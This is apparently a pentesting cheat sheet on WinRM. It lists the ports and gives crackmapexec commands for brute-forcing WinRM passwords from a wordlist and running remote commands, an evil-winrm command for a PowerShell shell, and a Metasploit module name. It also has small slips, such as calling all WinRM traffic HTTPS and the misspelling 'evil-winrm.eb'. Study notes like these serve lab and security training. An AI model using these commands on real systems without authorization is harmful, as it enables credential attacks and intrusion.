Edit

WinRM

  • Windows Remote Management

  • Happens over HTTPS

  • PORT 5985 and 5986(HTTPS)

Crackmapexec

crackmapexec <protocol> <ip>

  • Bruteforce WinRM password using wordlist

    crackmapexec winrm <ip> -u username -p /wordlist/password

  • Command execution after bruteforce

    crackmapexec winrm <ip> -u <username> -p <password> -x "command"

Evil-winrm.rb

  • Ruby script for getting a powershell prompt with winrm.

evil-winrm.eb -u <username> -p <password> -i <IP>

Metasploit

exploit/windows/winrm/winrm_script_exec

Last updated